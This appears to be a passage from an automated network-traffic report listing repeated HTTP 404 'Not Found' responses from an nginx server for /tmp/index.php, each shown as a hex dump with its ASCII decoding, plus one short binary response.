Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:22 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:26 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:28 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:30 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:32 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:34 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:36 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:38 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:40 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:42 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 06 63 42 f3 31 04 ed f1 49 f6 9d ed e4 21 9b 23 9a e8 31 55 12 c3 89 9b c2 63 9a 3b 0d 16 Data Ascii: #\6cB1I!#1Uc;
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:47 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:53 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:55 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Sat, 30 Nov 2024 10:13:56 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
